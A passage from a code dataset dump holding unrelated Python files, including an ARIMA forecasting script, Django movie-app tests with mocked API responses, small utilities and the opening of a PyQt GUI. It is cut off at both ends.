print(\"r2 score: \", r2_score_our)\n plt.plot(min_test_lib)\n if (flag == 1):\n x = range(360, 360+len(min_predict_lib))\n plt.plot(x, min_predict_lib, color='red')\n else:\n plt.plot(min_predict_lib, color='red')\n plt.show()\n\n\ndef arima_learn_forecast(training, testing, p, max_k, q):\n warnings.simplefilter('ignore')\n x = training.values\n size = int(len(training.values))\n train, test = training.values, testing.values\n history = [x for x in train]\n predictions = list()\n for t in range(len(test)):\n model = ARIMA(history, order=(p, max_k, q))\n model_fit = model.fit(disp=0)\n output = model_fit.forecast()\n yhat = output[0]\n predictions.append(yhat)\n obs = test[t]\n history.append(obs)\n print('predicted=%f, expected=%f' % (yhat, obs))\n error = mean_squared_error(test, predictions)\n print('Test MSE: %.3f' % error)\n r2 = r2_score(test, predictions)\n print(\"r2 score: \", r2)\n regr = OLS(test, predictions).fit()\n our_aic = AIC_finder(test, predictions, len(test), p, max_k, q)\n print(\"OLS AIC: \", regr.aic)\n print(\"Our AIC: \", our_aic)\n return regr.aic, our_aic, error, r2, test, predictions\n\n\ndef arima_learn_predict(training, testing, p, max_k, q):\n warnings.simplefilter('ignore')\n x = training.values\n size = int(len(training.values))\n train, test = training.values, testing.values\n history = [x for x in train]\n predictions = list()\n for t in range(len(test)):\n model = ARIMA(history, order=(p, max_k, q))\n model_fit = model.fit(disp=0)\n output = model_fit.predict(start=len(train), end=(\n len(train)+len(test)-1), typ='levels')\n yhat = output[0]\n predictions.append(yhat)\n obs = test[t]\n history.append(yhat)\n print('predicted=%f, expected=%f' % (yhat, obs))\n error = mean_squared_error(test, predictions)\n print('Test MSE: %.3f' % error)\n r2 = r2_score(test, predictions)\n print(\"r2 score: \", r2)\n x = range(len(train), len(train)+len(test))\n print(len(x), len(train))\n regr = OLS(test, predictions).fit()\n our_aic = AIC_finder(test, predictions, len(test), p, max_k, q)\n print(\"OLS AIC: \", regr.aic)\n print(\"Our AIC: \", our_aic)\n return regr.aic, our_aic, error, r2, np.append(train, test), predictions\n\n\ndef best_train_finder(training, p, max_k, q):\n X = training.values\n size = int(len(X) * 0.1)\n train, test = X[0:size], X[size:len(X)]\n history = [x for x in train]\n predictions = list()\n for t in range(len(test)):\n model = ARIMA(history, order=(5, 1, 0))\n model_fit = model.fit(disp=0)\n output = model_fit.forecast()\n yhat = output[0]\n predictions.append(yhat)\n obs = test[t]\n history.append(obs)\n print('predicted=%f, expected=%f' % (yhat, obs))\n error = mean_squared_error(test, predictions)\n print('Test MSE: %.3f' % error)\n print(\"r2 score: \", r2_score(test, predictions))\n # plot\n plt.plot(test)\n plt.plot(predictions, color='red')\n plt.show()\n\n\ndef integral_definer(df):\n values = df\n oper_values = np.array([0]).astype(float)\n counter = 0\n flag = 0\n max_k = 0\n for k in range(1, len(values)):\n if flag:\n continue\n for i in range(1, len(values)+1):\n if ((i-k-1) >= 0):\n oper_values = np.append(oper_values, 0)\n oper_values[i-1] = diff_operator(values[i-k-1:i], k)\n oper_values_cutted = oper_values[k:len(\n oper_values)+(1-k)*(len(values)-k) + counter]\n counter = counter - (k-1)\n print(k, \" test: \")\n if df_test(oper_values_cutted):\n flag = 1\n max_k = k\n ans = oper_values_cutted\n return max_k, ans\n\n\ndef avg_data(df): # скользящая средняя\n rows, columns = df.shape\n averages = []\n 
averages.append(df['Value'][0])\n for i in range(1, rows):\n elem = 0\n for j in range(i):\n elem = elem + df['Value'][j]\n elem = elem/i\n averages.append(elem)\n return averages\n\n\ndef white_noise(df): # первые разности\n rows, columns = df.shape\n noise = []\n noise.append(df['Value'][0])\n for i in range(1, rows):\n noise.append(df['Value'][i]-df['Value'][i-1])\n noise[0] = noise[1]\n return noise\n\n\ndef get_lag(mod, endog, exog, start_lag, max_lag, method, model_args=()):\n results = {} # dict\n method = method.lower()\n for lag in range(start_lag, start_lag + max_lag + 1):\n results[lag] = mod(endog, exog[:, :lag], *model_args).fit()\n if method == \"aic\":\n best_inf_crit, best_lag = min((v.aic, k) for k, v in iteritems(\n results)) # перебор по значениям из results\n return best_inf_crit, best_lag\n\ndef df_test(df):\n df_vect = df\n df_size = len(df_vect)\n autolag = 'AIC'\n max_lag = None\n regression = 'c'\n trend_size = len(regression) # размер тренда\n # Максимальное запаздывание, вычисляется как Т��Г соотвествующего выражения\n max_lag = int(np.ceil(12. * np.power(df_size / 100., 1/2)))\n max_lag = min(df_size // 2 - trend_size, max_lag)\n if max_lag < 0:\n raise ValueError('Dataset is too short')\n # массив с первыми разностями: элем_i = a[i+1] - a[i]\n df_diff = np.diff(df_vect)\n # массив с лагами, где max_lag - число \"сдвигов\" вниз\n df_diff_all = sm.tsa.lagmat(\n df_diff[:, None], max_lag, trim='both', original='in')\n df_size = df_diff_all.shape[0] # количество столбцов в массиве лагов\n # заменяем первый столбец df_diff_all на df_vect\n df_diff_all[:, 0] = df_vect[-df_size - 1:-1]\n df_diff_short = df_diff[-df_size:] # оставляем последние df_size элементов\n df_diff_full = df_diff_all\n start_lag = df_diff_full.shape[1] - \\\n df_diff_all.shape[1] + 1 # начальный лаг\n best_inf_crit, best_lag = get_lag(\n sm.OLS, df_diff_short, df_diff_full, start_lag, max_lag, autolag)\n best_lag -= start_lag # оптимальное значение лага\n # массив с лагами, но уже при оптимальном значении лага\n df_diff_all = sm.tsa.lagmat(\n df_diff[:, None], best_lag, trim='both', original='in')\n df_size = df_diff_all.shape[0]\n # заменяем первый столбец df_diff_all на df_vect\n df_diff_all[:, 0] = df_vect[-df_size - 1:-1]\n df_diff_short = df_diff[-df_size:]\n use_lag = best_lag\n # аппроксимация ряда методом наименьших квадратов\n resols = sm.OLS(df_diff_short, sm.tsa.add_trend(\n df_diff_all[:, :use_lag + 1], regression)).fit()\n adfstat = resols.tvalues[0] # получение необходимой статистики\n pvalue = mackinnonp(adfstat, regression=regression, N=1)\n critvalues = mackinnoncrit(N=1, regression=regression, nobs=df_size)\n if adfstat < critvalues[1]:\n print(\"Time series is stationary with crit value \", adfstat)\n return True\n else:\n print(\"Time series is not stationary with crit value \", adfstat)\n return False\n\n\ndef series_seasonal(df, window):\n seasonal = np.array([pd_nanmean(df[i::window], axis=0)\n for i in range(window)])\n return seasonal\n\n\ndef series_decompose_sum(df, window): # Аддитивная модель\n avg = df.Value.rolling(window=30).mean() # trend, но по-другому\n no_trend = df.Value - avg\n seasonal = series_seasonal(no_trend, 30)\n seasonal = seasonal - np.mean(seasonal, axis=0)\n size = no_trend.shape[0]\n season = np.tile(seasonal.T, size // window + 1).T[:size] # window = 30\n df['Season1'] = season\n sea_son = df.Season1\n residual = df.Value - avg - season\n return avg, sea_son, residual\n\n\ndef series_decompose_mul(df, window): # Мультипликативная модель\n avg = 
df.Value.rolling(window=30).mean() # trend, но по-другому\n no_trend = df.Value/avg\n seasonal = series_seasonal(no_trend, 30)\n seasonal = seasonal - np.mean(seasonal, axis=0)\n size = no_trend.shape[0]\n season = np.tile(seasonal.T, size // window + 1).T[:size] # window = 30\n df['Season2'] = season\n sea_son = df.Season2\n residual = df.Value - avg - season\n return avg, sea_son, residual\n\n\n# MAIN\ntraining = pd.read_excel('training.xlsx')\ntraining_decomp = pd.read_excel('training.xlsx')\nprint(training.columns) # названия столбов\n\n# добавляем новый столбец в наш dataframe\ntraining['Average'] = avg_data(training)\nresid = [training['Average'][0]]\n# добавляем новый столбец в наш dataframe\ntraining['Noise'] = white_noise(training)\nfor i in range(1, len(training['Average'])):\n resid.append(training['Average'][i] -\n training['Average'][i - 1] - training['Noise'][i])\nresid[0] = resid[1]\ntraining['Residual'] = resid # добавляем новый столбец в наш dataframe\ndecomp_avg_add, decomp_season_add, decomp_resid_add = series_decompose_sum(\n training, 30)\ndecomp_avg_mult, decomp_season_mult, decomp_resid_mult = series_decompose_mul(\n training, 30)\n\n# Рисуем красивые графики\nfig = plt.figure(figsize=(20, 10), num='Time Series Decomposition')\nax1 = fig.add_subplot(321, title=\"Additive model\", ylabel=\"Trend\")\nax2 = fig.add_subplot(322, title=\"Multiplicative model\")\nax3 = fig.add_subplot(323, ylabel=\"Season\")\nax4 = fig.add_subplot(324)\nax5 = fig.add_subplot(325, ylabel=\"Residue\")\nax6 = fig.add_subplot(326)\nsns.lineplot(data=decomp_avg_add, ax=ax1)\nsns.lineplot(data=decomp_season_add, ax=ax3)\nsns.lineplot(data=decomp_resid_add, ax=ax5)\nsns.lineplot(data=decomp_avg_mult, ax=ax2)\nsns.lineplot(data=decomp_season_mult, ax=ax4)\nsns.lineplot(data=decomp_resid_mult, ax=ax6)\n\nplt.show()\n\nprint(\"Our test:\")\ndf_test(training['Value'])\nprint(\"Library test:\")\n# Проверяем рабочесть нашего теста Дики-Фуллера на библиотечном\nprint(sm.tsa.adfuller(training['Value']))\n\nprint()\n\n# Поиск порядка интегрируемости\nvalues = training['Value'].to_numpy()\nmax_k, training_max_k = integral_definer(values)\nprint(\"Порядок интегрируемости: \", max_k)\n\n# Ввод необходимый для работы ARIMA\ntraining = pd.read_excel('training.xlsx', header=0, parse_dates=[\n 0], index_col=0, squeeze=True)\ntesting = pd.read_excel('testing.xlsx', header=0, parse_dates=[\n 0], index_col=0, squeeze=True)\n\n# Тут мы определяем параметры ARMA модели (p,q)\n# Для нашей модели надо проверить p = 0,1,2 и q = 0,1,2,3,4\nplt.figure(figsize=(8, 8))\nplt.subplot(211)\nplot_acf(training_max_k, ax=plt.gca())\nplt.subplot(212)\nplot_pacf(training_max_k, ax=plt.gca())\nplt.show()\n\n# Модель обучается и предсказывает\narima_optimizer_AIC(training, testing, 1, 1, 4, 0)\nbest_train_finder(training, 1, max_k, 4)\n","sub_path":"Bachelor/Third grade/Python/Task2/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"160953898","text":"#! 
/usr/bin/python3\n\n\nfrom random import random\nfrom sys import argv\n\n\ndef random_selection(*args):\n rnd = []\n for a in args:\n mn, mx = a\n rnd.append(random() * (mx - mn) + mn)\n return tuple(rnd)\n\n\n\ndef generate_balls(num, base):\n \"\"\"\n \"\"\"\n mass_range = tuple(((0.2, 10),))\n size_range = tuple(((0.03, 0.30),))\n color_range = tuple(((0.1, 1.0), (0.1, 1.0), (0.1, 1.0)))\n x_range = tuple(((-20, 20),))\n y_range = tuple(((10, 100),))\n vxy_range = tuple(((-1,1),(-1,1)))\n\n\n for i in range(num):\n m, = random_selection(*mass_range)\n ri, = random_selection(*size_range)\n r, g, b = random_selection(*color_range)\n x, = random_selection(*x_range)\n y, = random_selection(*y_range)\n vx,vy = random_selection(*vxy_range)\n print(' ' \\\n % (m, x, y, vx, vy, ri))\n print(' ' \\\n % (i+base, 0, g, g))\n print('')\n\n\n\ndef main(name, args):\n \"\"\"\n \"\"\"\n num = 100\n base = 4\n\n if args:\n for i, arg in enumerate(args):\n if i==0:\n num = int(arg)\n elif i==1:\n base = int(arg)\n else:\n break\n\n generate_balls(num, base)\n\n\n\nif __name__ == \"__main__\":\n main(argv[0], argv[1:])\n\n","sub_path":"t4m1/build/FOSSSim/balls.py","file_name":"balls.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"85747639","text":"import smake\nimport os\nenv = os.environ\nif '4' in smake.options.build_suffix:\n env['PATH'] = '/home/erin/apps/gcc-install-4.1.1/bin:' + env['PATH']\n env['LD_LIBRARY_PATH'] = '/home/erin/apps/gcc-install-4.1.1/lib:' + env.get('LD_LIBRARY_PATH', '')\n env['BOOSTROOT'] = '/home/erin/libs/boost_1_33_1_gcc41'\n env['BOOSTLIBDIR'] = '/home/erin/libs/boost_1_33_1_gcc41/stage/lib'\n env['PYINCLUDEDIR'] = '/home/erin/apps/usr/local/include/python2.4'\n env['ENABLEPYMODS'] = '1'\n del env['XERCESCROOT']\nelse:\n env['ENABLEPYMODS'] = '1'\n env['PYINCLUDEDIR'] = '/usr/include/python2.3'\n","sub_path":".smake/customizenix.py","file_name":"customizenix.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484309954","text":"# coding: utf-8\n\nimport mock\nimport logging\n\nimport responses\n\nfrom django.core.urlresolvers import reverse\n\nfrom django.test import TestCase, Client\nfrom django.test.utils import override_settings\nfrom django.core.files.base import File\n\nfrom movie.tasks import cleanup\nfrom movie.factories import MovieFactory, GenreFactory, ImdbFactory\nfrom actor.factories import ActorFactory\n\n\nclass GenreModelTests(TestCase):\n def setUp(self):\n self.genre = GenreFactory(name='Action', slug='action')\n\n def test_get_str(self):\n self.assertEqual('Action', str(self.genre))\n\n\n@override_settings(\n CELERY_EAGER_PROPAGATES_EXCEPTIONS=True,\n CELERY_ALWAYS_EAGER=True,\n BROKER_BACKEND='memory')\nclass MovieModelTests(TestCase):\n def setUp(self):\n genres = GenreFactory.create_batch(3)\n cast = ActorFactory.create_batch(2)\n self.movie = MovieFactory.create(\n title='Bottle Shock',\n slug='bottle-shock',\n genres=genres,\n cast=cast)\n\n def test_get_str(self):\n self.assertEqual('Bottle Shock', str(self.movie))\n\n def test_get_absolute_url(self):\n expected = '/movie/bottle-shock/'\n result = self.movie.get_absolute_url()\n self.assertEqual(expected, result)\n\n def test_add_genres(self):\n genres = ['Comedy', 'Romance']\n self.movie.add_genres(genres)\n self.assertEqual(2, self.movie.genres.count())\n\n def test_add_cast(self):\n actors = [\n 'Clint 
Eastwood',\n 'Tom Cruise',\n 'Bruce Willis',\n 'Jean-Claude Van Damme',\n 'Arnold Schwarzenegger']\n\n self.movie.add_cast(actors)\n self.assertEqual(5, self.movie.cast.count())\n\n @mock.patch('movie.models.cleanup.delay')\n def test_if_post_delete_is_connected(self, mock):\n movie = MovieFactory()\n movie.delete()\n mock.assert_called_once_with(movie)\n\n @mock.patch('movie.tasks.logger.info')\n def test_task_cleanup(self, mock):\n file_mock = mock.MagicMock(spec=File, name='FileMock')\n movie = MovieFactory.create()\n movie.poster = file_mock\n\n cleanup.run(movie)\n\n expected = 'The poster from %s was removed from filesystem' % movie\n mock.assert_called_once_with(expected)\n\n def test_task_cleanup_with_movie_without_poster(self):\n movie = MovieFactory.create()\n result = cleanup.run(movie)\n self.assertIsNone(result)\n\n def test_get_prepared_query(self):\n expected = \"\"\"\n SELECT g.total + c.total\n FROM\n (\n SELECT COUNT (*) AS total\n FROM movie_movie_genres\n WHERE movie_id = movie_movie.id AND genre_id IN (1,2,3,0)\n ) g,\n (\n SELECT COUNT (*) AS total\n FROM movie_movie_cast\n WHERE movie_id = movie_movie.id AND actor_id IN (1,0)\n ) c\n \"\"\"\n\n result = self.movie._get_prepared_query()\n self.assertEqual(expected, result)\n\n def test_get_similar_movies(self):\n war = GenreFactory.create(name='War')\n crime = GenreFactory.create(name='Crime')\n comedy = GenreFactory.create(name='Comedy')\n adventure = GenreFactory.create(name='Adventure')\n\n scarlett = ActorFactory.create(name='Scarlett Johansson')\n chris = ActorFactory.create(name='Chris Evans')\n paul = ActorFactory.create(name='Paul Rudd')\n emily = ActorFactory.create(name='Emily VanCamp')\n\n john = ActorFactory.create(name='John Doe')\n\n fat = MovieFactory(\n title='Fat to be ignored',\n genres=(crime,),\n cast=(john,))\n\n MovieFactory.create_batch(25, genres=(crime, adventure,), cast=(john,))\n\n civil_war = MovieFactory.create(\n title='Captain America: Civil War',\n cast=(scarlett, chris, paul, emily,),\n genres=(war, comedy,))\n\n winter_soldier = MovieFactory.create(\n title='Captain America: The Winter Soldier',\n cast=(scarlett, chris,),\n genres=(war, crime,))\n\n ant_man = MovieFactory.create(\n title='Ant-Man',\n cast=(scarlett, paul, john,),\n genres=(war, crime, comedy, adventure,))\n\n data = civil_war.similar\n\n expected = [ant_man.id, winter_soldier.id]\n result = [i.id for i in data]\n\n self.assertEqual(expected, result)\n self.assertEqual(10, fat.similar.count())\n\n\n@override_settings(\n CELERY_EAGER_PROPAGATES_EXCEPTIONS=True,\n CELERY_ALWAYS_EAGER=True,\n BROKER_BACKEND='memory')\nclass ImdbModelTest(TestCase):\n @responses.activate\n def setUp(self):\n logging.disable(logging.CRITICAL)\n\n responses.add(\n responses.GET,\n 'http://imdb.com/poster.jpg',\n status=200,\n content_type='application/json')\n\n responses.add(\n responses.GET,\n 'http://www.omdbapi.com/?i=tt0137523&plot=full&r=json',\n match_querystring=True,\n json={\n \"Title\": \"Fight Club\",\n \"Year\": \"1999\",\n \"Rated\": \"R\",\n \"Released\": \"15 Oct 1999\",\n \"Runtime\": \"139 min\",\n \"Genre\": \"Drama\",\n \"Director\": \"David Fincher\",\n \"Writer\": \"Chuck Palahniuk (novel), Jim Uhls (screenplay)\",\n \"Actors\": \"Edward Norton, Brad Pitt, Meat Loaf, Zach Grenier\",\n \"Plot\": \"A ticking-time-bomb insomniac and a slippery...\",\n \"Language\": \"English\",\n \"Country\": \"USA, Germany\",\n \"Awards\": \"Nominated for 1 Oscar. 
Another 8 wins & 31...\",\n \"Poster\": \"http://imdb.com/poster.jpg\",\n \"Metascore\": \"66\",\n \"imdbRating\": \"10\",\n \"imdbVotes\": \"1,314,286\",\n \"imdbID\": \"tt0137523\",\n \"Type\": \"movie\",\n \"Response\": \"True\"\n },\n status=200,\n content_type='application/json')\n\n self.imdb = ImdbFactory(imdb_id='tt0137523')\n\n def tearDown(self):\n # keep all clear after run tests.\n cleanup(self.imdb.movie)\n\n def test_get_str(self):\n expected = 'Synchronize %s with IMDB (%s)'\n expected %= (self.imdb.imdb_id, self.imdb.movie)\n self.assertEqual(expected, str(self.imdb))\n\n @responses.activate\n @mock.patch('movie.models.sync.delay')\n def test_if_post_save_is_connected(self, m_delay):\n self.imdb.save()\n m_delay.assert_called_once_with(self.imdb)\n\n @responses.activate\n @mock.patch('movie.tasks.logger.info')\n def test_try_synchronize_with_broken_api(self, m_logger):\n responses.add(\n responses.GET,\n 'http://www.omdbapi.com/?i=tt0000000&plot=full&r=json',\n match_querystring=True,\n status=500,\n content_type='application/json')\n\n # the factory will trigger the 'save' in model.\n imdb = ImdbFactory.create(imdb_id='tt0000000')\n\n message = 'unable to get data from IMDB to %s' % imdb.movie\n m_logger.assert_called_once_with(message)\n\n @responses.activate\n @mock.patch('movie.tasks.logger.info')\n def test_try_synchronize_with_failure_api(self, m_logger):\n responses.add(\n responses.GET,\n 'http://www.omdbapi.com/?i=tt0000000&plot=full&r=json',\n match_querystring=True,\n json={\"Error\": \"A friendly and comforting message.\"},\n status=200,\n content_type='application/json')\n\n imdb = ImdbFactory.create(imdb_id='tt0000000')\n\n message = 'unable to get data from IMDB to %s because: %s'\n message %= (imdb.movie, 'A friendly and comforting message.')\n\n m_logger.assert_called_once_with(message)\n\n @responses.activate\n def test_try_synchronize_movies_that_have_no_rating_yet(self):\n responses.add(\n responses.GET,\n 'http://imdb.com/poster.jpg',\n status=200,\n content_type='application/json')\n\n responses.add(\n responses.GET,\n 'http://www.omdbapi.com/?i=tt0803096&plot=full&r=json',\n match_querystring=True,\n json={\n \"Title\": \"Warcraft\",\n \"Year\": \"2016\",\n \"Rated\": \"PG-13\",\n \"Released\": \"10 Jun 2016\",\n \"Runtime\": \"123 min\",\n \"Genre\": \"Action, Adventure, Fantasy\",\n \"Director\": \"Duncan Jones\",\n \"Writer\": \"Duncan Jones (screenplay), Charles Leavitt (scr...\",\n \"Actors\": \"Travis Fimmel, Paula Patton, Ben Foster, Dominic..\",\n \"Plot\": \"The peaceful realm of Azeroth stands on the brink...\",\n \"Language\": \"English\",\n \"Country\": \"USA\",\n \"Awards\": \"N/A\",\n \"Poster\": \"http://imdb.com/poster.jpg\",\n \"Metascore\": \"N/A\",\n \"imdbRating\": \"N/A\",\n \"imdbVotes\": \"1,620\",\n \"imdbID\": \"tt0803096\",\n \"Type\": \"movie\",\n \"Response\": \"True\"\n },\n status=200,\n content_type='application/json')\n\n movie = MovieFactory(rating=0.0)\n imdb = ImdbFactory(imdb_id='tt0803096', movie=movie)\n\n self.assertEqual(0.0, imdb.movie.rating)\n\n\nclass MovieListViewTests(TestCase):\n def setUp(self):\n self.client = Client()\n\n drama = GenreFactory(name='Drama', slug='drama')\n thriller = GenreFactory(name='Thriller', slug='thriller')\n\n MovieFactory.create_batch(5, genres=(drama,))\n MovieFactory.create_batch(5, genres=(thriller,))\n MovieFactory.create_batch(5)\n\n def test_get(self):\n response = self.client.get(reverse('movie-list'))\n self.assertEqual(response.status_code, 200)\n\n def 
test_get_filtering_by_genre(self):\n url = reverse('movie-list-by-genre', args=('drama',))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n movies = response.context['object_list']\n self.assertEqual(5, movies.count())\n\n\nclass MovieDetailViewTests(TestCase):\n def setUp(self):\n self.client = Client()\n\n MovieFactory.create_batch(5)\n\n morena = ActorFactory(name='Morena Baccarin')\n fabio = ActorFactory(name='Fabio Porchat')\n adele = ActorFactory(name='Adele Exarchopoulos')\n\n comedy = GenreFactory(name='Comedy')\n action = GenreFactory(name='Action')\n crime = GenreFactory(name='Crime')\n\n MovieFactory(\n title='Deadpool', genres=(comedy, action,), cast=(morena,))\n\n MovieFactory(\n title='Foo', genres=(crime, action,), cast=(morena, fabio, adele,))\n\n MovieFactory(\n title='Bar', genres=(comedy, action,), cast=(morena, adele,))\n\n def test_get(self):\n url = reverse('movie-detail', args=('deadpool',))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n\nclass GenreDetailViewTests(TestCase):\n def setUp(self):\n self.client = Client()\n GenreFactory(name='Comedy', slug='comedy')\n\n def test_get(self):\n url = reverse('movie-list-by-genre', args=('comedy',))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n","sub_path":"app/movie/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"185965304","text":"from typing import Any, Callable\nfrom time import perf_counter\nfrom functools import wraps\n\n\ndef timer_decorator(fn: Callable[..., Any]):\n \"\"\"\n timer_decorator calls fn and prints how long it took to execute.\n\n :param fn: The wrapped function.\n :return: The return value of the wrapped function.\n \"\"\"\n @wraps(fn)\n def wrapper(*args, **kwargs):\n start = perf_counter()\n retval = fn(*args, **kwargs)\n end = perf_counter()\n print(f'{fn.__module__}.{fn.__name__}:\\t{\"%.2f\" %(end-start)} seconds')\n return retval\n\n return wrapper","sub_path":"algorithms/utils/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"130852612","text":"from itertools import islice\n\nimport subprocess\n\nMAX = 2000\n\ndef open_(𝚵, Ѵ, context):\n for target in context['targets']:\n logѫ = target['logѫ']\n Ѵ.command(f'echo \"{logѫ}\"')\n\n r = subprocess.run(['tail', '-n', str(MAX), logѫ.ƨ], stdout=subprocess.PIPE)\n ƨ = r.stdout.decode()\n\n lines = ƨ.split('\\n')[:-1]\n\n options = Ѵ.current.buffer.options\n options['modifiable'] = True\n Ѵ.current.buffer[:] = lines\n options['modifiable'] = False\n options['modified'] = False\n Ѵ.feedkeys('G')\n\ndef undo(𝚵, Ѵ, context):\n options = Ѵ.current.buffer.options\n options['modifiable'] = True\n Ѵ.feedkeys('u', options='n')\n options['modifiable'] = False\n options['modified'] = False\n\ndef redo(𝚵, Ѵ, context):\n options = Ѵ.current.buffer.options\n options['modifiable'] = True\n Ѵ.feedkeys('U', options='n')\n options['modifiable'] = False\n options['modified'] = False\n\ndef delete(𝚵, Ѵ, context):\n for target in context['targets']:\n import os\n\n logѫ = target['logѫ']\n Ѵ.command(f'echo \"{logѫ}\"')\n\n os.remove(logѫ.ƨ)\n\n options = Ѵ.current.buffer.options\n options['modifiable'] = True\n Ѵ.current.line = 'DROPPPPPPED'\n options['modifiable'] = False\n options['modified'] = False\n\ndef 
doAction(view, Ѵ, action, context):\n return DEFAULT_ACTIONS[action](view, Ѵ, context)\n\n\nDEFAULT_ACTIONS = {\n 'open': open_,\n 'undo': undo,\n 'redo': redo,\n 'delete': delete\n}\n","sub_path":"rplugin/python3/log/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68980288","text":"from threading import *\n\nclass BookMyBus:\n \n def __init__(self,availableSeats):\n self.availableSeats = availableSeats\n self.l = Semaphore()\n \n def buy(self,seatsRequested):\n self.l.acquire()\n print(\"Total seats available:\",self.availableSeats)\n \n if(self.availableSeats>=seatsRequested):\n print(\"Confirming a seat\")\n print(\"Processing the payment\")\n print(\"Printing the Ticket\")\n self.availableSeats-=seatsRequested\n else:\n print(\"Sorry.No seats available\")\n self.l.release()\n \n \nobj = BookMyBus(10) \nt1 = Thread(target=obj.buy,args=(3,))\nt2 = Thread(target=obj.buy,args=(4,))\nt3 = Thread(target=obj.buy,args=(4,))\n\nt1.start()\nt2.start()\nt3.start()","sub_path":"multithreading/bookmybus.py","file_name":"bookmybus.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191735674","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport jsonfield.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('taxbrain', '0040_auto_20150204_1504'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='taxsaveinputs',\n name='tax_result',\n field=jsonfield.fields.JSONField(default=None, null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"webapp/apps/taxbrain/migrations/0041_auto_20150225_1609.py","file_name":"0041_auto_20150225_1609.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"370892269","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .forms import orderForm\nfrom .models import OrderHist\n\norder = OrderHist()\n\n\ndef rendrer(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = orderForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n order.pizza = form.cleaned_data['pizza']\n order.name = form.cleaned_data['name']\n order.address = form.cleaned_data['address']\n order.phone = form.cleaned_data['phone']\n order.save()\n return render(request, 'success.html', {'pizza':order.pizza, 'name':order.name, 'address':order.address, 'phone':order.phone})\n \n # if a GET (or any other method) we'll create a blank form\n else:\n form = orderForm()\n\n return render(request, 'index.html', {'form': form})\n\n","sub_path":"elmenu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576733249","text":"import sys, time, os\nimport numpy as np\nfrom os import getcwd, system\nfrom os.path import join\nfrom shutil import rmtree\nfrom run_makedata import main_predict, main_prep_qgis\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QPushButton, QComboBox, QVBoxLayout, 
QFileDialog, QMessageBox, QTextBrowser\n\n\nfrom QgisIntegration.QgisStandalone import QgisStandalone\nfrom run_makedata import main_predict, main_prep_qgis\n\n\n\n\n\nclass MainForm(QWidget):\n def __init__(self, name = 'MainForm'):\n super(MainForm,self).__init__()\n self.setWindowTitle(name)\n self.cwd = getcwd() \n self.resize(600, 300) \n\n self.chosen_model = None\n self.output = None\n self.chosen_file = None\n self.save_path = None\n self.has_result = False\n\n self.textbox = QTextBrowser(self)\n self.textbox.resize(600, 200)\n self.textbox.setText('This is the documentation;This is the documentation;This is the documentation;\\nThis is the documentation;This is the documentation;This is the documentation;\\nThis is the documentation;')\n\n\n ## btn\n self.label1 = QLabel(\"Choose File:\", self)\n self.btn_chooseFile = QPushButton(\"Choose File\", self) \n\n self.label2 = QLabel(\"Select Model:\", self)\n self.btn_selectModel = QComboBox(self) \n self.btn_selectModel.addItems(['Choose Model', 'XGBOOST','DECISION TREE','SVM'])\n\n self.btn_runModel = QPushButton(\"Run Model\", self) \n\n self.label3 = QLabel(\"Choose Save Path:\", self)\n self.btn_chooseDir = QPushButton(\"Choose Save Path\", self) \n\n self.btn_exportResult = QPushButton(\"Export Result\", self) \n\n self.btn_runModel.setEnabled(False)\n self.btn_exportResult.setEnabled(False)\n\n\n\n\n\n layout = QVBoxLayout()\n layout.addWidget(self.textbox)\n layout.addWidget(self.label1)\n layout.addWidget(self.btn_chooseFile)\n layout.addWidget(self.label2)\n layout.addWidget(self.btn_selectModel)\n layout.addWidget(self.btn_runModel)\n layout.addWidget(self.label3)\n layout.addWidget(self.btn_chooseDir)\n layout.addWidget(self.btn_exportResult)\n self.setLayout(layout)\n\n\n self.btn_chooseFile.clicked.connect(self.slot_btn_chooseFile)\n self.btn_selectModel.activated[str].connect(self.slot_btn_selectModel)\n self.btn_runModel.clicked.connect(self.slot_btn_runModel)\n self.btn_chooseDir.clicked.connect(self.slot_btn_chooseDir)\n self.btn_exportResult.clicked.connect(self.slot_btn_exportResult)\n\n\n\n\n\n def slot_btn_chooseFile(self):\n self.chosen_file = QFileDialog.getExistingDirectory(self, \"getExistingDirectory\", \"./\") \n self.btn_chooseFile.setText(self.chosen_file)\n self.temp_dir = \"C:\\\\Users\\\\yhhjack\\\\Documents\\\\GitHub\\\\PAWS_SoftWare\\\\temp\\\\\" + str(int(time.time()))+'\\\\'\n os.mkdir(self.temp_dir)\n self.qgis = QgisStandalone(qgis_install_path=\"C:\\\\Program Files (x86)\\\\QGIS 2.18\",\n 